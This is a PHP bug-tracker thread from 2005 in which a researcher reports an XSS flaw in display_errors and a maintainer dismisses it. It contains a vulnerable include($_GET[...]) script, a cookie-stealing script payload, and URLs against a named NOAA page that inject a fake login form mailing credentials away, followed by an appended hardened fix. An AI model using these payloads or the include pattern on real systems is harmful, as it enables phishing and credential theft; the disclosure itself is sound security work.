ID: 33173
User updated by: max at jestsuper dot pl
Reported By: max at jestsuper dot pl
Status: Bogus
Bug Type: *General Issues
Operating System: *
PHP Version: *
New Comment:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

> ID: 33173
> Updated by: [EMAIL PROTECTED]
> Reported By: max at jestsuper dot pl
> -Status: Open
> +Status: Bogus
> Bug Type: *General Issues
> -Operating System: FreeBSD
> +Operating System: *
> -PHP Version: 4.3.11
> +PHP Version: *
> New Comment:
>
> Thank you for taking the time to write to us, but this is not
> a bug.

This is bug [XSS].

> Please double-check the documentation available at
> http://www.php.net/manual/ and the instructions on how to report
> a bug at http://bugs.php.net/how-to-report.php

Ok. But this bug still exists, if (html_errors false) etc.

>
> You're not supposed to pass the error information to your users. Show
> errors is only a convenience thing to aid you while developing. Thus no
> user will ever see such error messages. So in the end it is not usable
> for phishing and alike.

It is.. ;] That can be very dangerous. For example phishing. This is XSS!
So ok. Example newweb.wrh.noaa.gov

http://newweb.wrh.noaa.gov/pdt/prototype/gfeGraphics/gfeGraphics.php?imgSource=%3CP%3E%3Cfont%20color=red%3E%3CP%3E%3Ch1%3EWARNING!%20SYSTEM%20ERROR%3CBR%3EPlease%20login: %3C/h1%3E%3C/font%3E%3Cfont%20size=-4%3E%3C/center%3E%20%3CFORM%20METHOD=POST%20ACTION=mailto:[EMAIL PROTECTED]: %3CINPUT%20TYPE=text%20NAME=login%20SIZE=9%3E%3CP%3EPASSWORD: %3CINPUT%20TYPE=password%20NAME=passwd%20SIZE=9%3E%3CP%3E%3Cinput%20type=submit%20name=go%20value=Login%3E%3C/form%3E%3Cfont%20color=white%3E

http://newweb.wrh.noaa.gov/pdt/prototype/gfeGraphics/gfeGraphics.php?imgSource=<iframe src=http://newweb.wrh.noaa.gov>

But PHP errors (Warning) can be on a BANK site... and you can create a form ... phishing! Tell me what is wrong.
Thx
SecurityReason.Com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (FreeBSD)

iD8DBQFCmjvuznmvyJCR4zQRApfYAKCHEknKWRw8zchV6qIwkM0DZt9JNQCfRvcm
IDvuoOSzh75uSA9A1xnFiYc=
=S4rb
-----END PGP SIGNATURE-----


Previous Comments:
------------------------------------------------------------------------

[2005-05-28 19:02:37] [EMAIL PROTECTED]

Thank you for taking the time to write to us, but this is not
a bug. Please double-check the documentation available at
http://www.php.net/manual/ and the instructions on how to report
a bug at http://bugs.php.net/how-to-report.php

You're not supposed to pass the error information to your users. Show
errors is only a convenience thing to aid you while developing. Thus no
user will ever see such error messages. So in the end it is not usable
for phishing and alike.

------------------------------------------------------------------------

[2005-05-28 16:57:51] max at jestsuper dot pl

Description:
------------
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Author: cXIb8O3(Maksymilian Arciemowicz)
Date: 28.5.2005
from securityreason.com TEAM

- --- 0. Bug in PHP 4.3.11 display_error. ---

This bug can be dangerous, because someone can do XSS and phishing attacks.
The problem exists in display_errors..

Example php script:

<?php
include($_GET['varible']);
?>

and now the request is

?varible=XXX

so we can see an error.

- ---
Warning: main(XXX): failed to open stream: No such file or directory in /www/dupa.php on line 2

Warning: main(): Failed opening 'XXX' for inclusion (include_path='.:') in /www/dupa.php on line 2
- ---

Normal. But now varible has, for example,

<h1>SR</h1>

And the error message is:

- ---
Warning: main( SR ): failed to open stream: No such file or directory in /www/dupa.php on line 2

Warning: main(): Failed opening '<h1>SR</h1>' for inclusion (include_path='.:') in /www/dupa.php on line 2
- ---

So XSS... The tags <script> and <iframe> can be dangerous, because you can see cookies etc.
For example.
?varible=<script>alert(document.cookie);</script>

And you have the cookies from this domain!
This XSS is critical, because it exists in display_error and a hacker can do XSS and phishing attacks.
For example, if this bug exists on a bank site... a hacker can create a <FORM> or a mirror site...

- --- 1.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG-KEY: securityreason.com TEAM

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (FreeBSD)

iD8DBQFCmIWvznmvyJCR4zQRAuqtAKCcyXWQnMdPvCn+6+npQiGEbXvAZwCgq172
+J8w9EzGFE49sXxP1MPbSfI=
=QksY
-----END PGP SIGNATURE-----

Actual result:
--------------
XSS

------------------------------------------------------------------------

-- 
Edit this bug report at http://bugs.php.net/?id=33173&edit=1
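
Added example (not part of the bug report and not PHP project code): a hardened form of the report's include script, following the maintainer's point that display_errors is a development aid, and escaping the message where errors are still shown. The PAGES allowlist, the file paths under pages/ and the APP_ENV switch are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Production: keep engine diagnostics out of the response, keep them in the log.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Hypothetical allowlist: the request selects a key, never a path.
const PAGES = [
    'home'  => __DIR__ . '/pages/home.php',
    'about' => __DIR__ . '/pages/about.php',
];

// Builds the error text for development output. The message can contain
// request data (as in the report's warnings), so it is escaped before
// it reaches HTML.
function render_error(int $errno, string $errstr, string $errfile, int $errline): string
{
    $text = sprintf('Warning [%d]: %s in %s on line %d', $errno, $errstr, $errfile, $errline);
    return '<pre>' . htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</pre>';
}

set_error_handler(function (int $errno, string $errstr, string $errfile, int $errline): bool {
    // Always log; the visitor only sees the escaped text on a dev host.
    error_log("[$errno] $errstr in $errfile:$errline");
    if (getenv('APP_ENV') === 'dev') { // APP_ENV is a hypothetical switch
        echo render_error($errno, $errstr, $errfile, $errline);
    }
    return true; // PHP's built-in handler does not run
});

// Same parameter name as in the report. Arrays (?varible[]=x) and unknown
// keys are rejected before include is reached.
$key = $_GET['varible'] ?? 'home';
if (!is_string($key) || !array_key_exists($key, PAGES)) {
    http_response_code(404);
    exit('Not found');
}

include PAGES[$key];
```

With the allowlist in place the value from the query string never becomes part of a path or of an engine warning, so a request such as ?varible=<h1>SR</h1> ends in the 404 branch.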